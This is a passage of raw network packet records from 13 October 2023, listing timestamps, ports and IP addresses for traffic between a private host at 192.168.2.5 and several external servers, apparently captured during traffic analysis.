Oct 13, 2023 15:21:17.644903898 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.644927025 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.645550013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:17.646606922 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.646625042 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.646708012 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.646717072 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.646759033 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.648561001 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.648587942 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.648617983 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.648626089 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.648647070 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.648664951 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.651206970 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.651226997 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.651282072 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.651289940 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.651305914 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.651330948 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.652992964 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.653018951 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.653079033 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.653089046 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.653130054 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.655211926 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.655236006 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.655286074 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.655293941 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.655309916 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.655334949 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.657187939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.657208920 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.657275915 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.657284975 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.657326937 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.659096956 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.659133911 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.659210920 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.659218073 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.659256935 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.659256935 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.660541058 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.660559893 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.660614967 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.660624027 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.660640955 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.660662889 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.661843061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:17.661889076 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.661931038 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.661952972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.661959887 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.661987066 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.661997080 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.662030935 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.662163973 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.662172079 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.662184000 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.734306097 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.734329939 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.734477043 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.734541893 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.734694004 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.734808922 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.734883070 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.735006094 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.735269070 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.735362053 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.735369921 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.735456944 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.735723019 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.735776901 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.735949039 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.736140966 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.736329079 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.736342907 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.736491919 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.736610889 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.736782074 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.736915112 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.737253904 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.737520933 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.737597942 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.737837076 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.737921000 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.738271952 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.738291979 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.738485098 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.738528013 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.738924980 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.738954067 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.743421078 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.743633986 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.801714897 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:17.806303024 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:17.806380033 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:17.997590065 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:17.997672081 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:17.998140097 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:17.998202085 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:18.003748894 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:18.046480894 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:18.054204941 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.054224968 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.054379940 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.054393053 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.054464102 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.054532051 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.054680109 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.054985046 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.055027008 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.055444956 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.055496931 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.055655003 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.055701971 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.055843115 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.055985928 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.056129932 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.056296110 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.056404114 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.056616068 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.056854963 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.056906939 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.057235956 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.057384014 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.057476997 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.057521105 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.062391996 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.062596083 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.062608957 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.062623024 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.062844992 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.062859058 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.062974930 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.063060045 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.063220978 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.063235998 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.063239098 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.063816071 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.063858032 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.063958883 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.064030886 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.064265966 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.064342022 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.064539909 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.064603090 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.064699888 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.064750910 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.064877033 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.065269947 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.065613031 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.065764904 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.065886021 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.066106081 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.066360950 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.066687107 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.066884995 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.382365942 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.382385969 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.382400990 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.382622004 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.382631063 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.382641077 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.382814884 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.382889032 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.383148909 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.383218050 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.383428097 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.383738995 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.383893967 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.384068966 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.384167910 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.384253979 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.384623051 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.384840012 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.385004044 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.385107040 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.385344982 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.385515928 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.385617018 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.385895967 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.386158943 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.386298895 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.386452913 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.386554956 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.386672974 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.387000084 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.387101889 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.387177944 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.387223959 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.387316942 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.387531996 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.387662888 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.387839079 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.388040066 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.388328075 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.388549089 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.388653040 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.388912916 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.389034986 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.389045000 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.389168978 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.389331102 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.389345884 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.389588118 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.389791012 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.390100002 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.390192986 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.390367031 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.390604973 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.391160965 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.391362906 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.430685997 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:18.430711985 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:18.430752993 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:18.430792093 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:18.430879116 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:18.430932999 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:18.585077047 CEST	49743	443	192.168.2.5	149.154.167.99
Oct 13, 2023 15:21:18.585102081 CEST	443	49743	149.154.167.99	192.168.2.5
Oct 13, 2023 15:21:18.595073938 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:18.706187010 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.706379890 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.706391096 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.706427097 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.706612110 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.706768990 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.706947088 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.707101107 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.707365036 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.707456112 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.707690954 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.707813025 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.707922935 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.708102942 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.708168030 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.708448887 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.708549976 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.708821058 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.708838940 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.709119081 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.709188938 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.709207058 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.709346056 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.709563971 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.709737062 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.709846020 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.710000038 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.710087061 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.710424900 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.710510969 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.710522890 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.710676908 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.710727930 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.710752010 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.710902929 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.711074114 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.711206913 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.711317062 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.711493015 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.711585999 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.711776972 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.711869001 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.711994886 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.712122917 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.712188959 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.712292910 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.712446928 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.712528944 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.712965012 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.713032961 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.713145971 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.713186979 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.713205099 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.713371038 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:18.713726044 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:18.817188978 CEST	49731	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:18.818450928 CEST	49745	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:18.917648077 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:18.918807030 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:18.978755951 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:19.030042887 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030055046 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030061960 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030194998 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030354977 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030495882 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030622959 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030719042 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030878067 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030886889 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.030981064 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.031135082 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.031267881 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.031517029 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.031766891 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.031831026 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.031996012 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.032099009 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.032166004 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.032223940 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.032481909 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.032705069 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.032838106 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.033004999 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.033539057 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.033746958 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.033824921 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.033848047 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.033909082 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.033986092 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.034006119 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.034199953 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.034298897 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.034468889 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.034508944 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.034821033 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.034837008 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.035139084 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.035259962 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.035351992 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.035429955 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.035474062 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.035600901 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.035808086 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.035852909 CEST	36011	49726	51.255.152.132	192.168.2.5
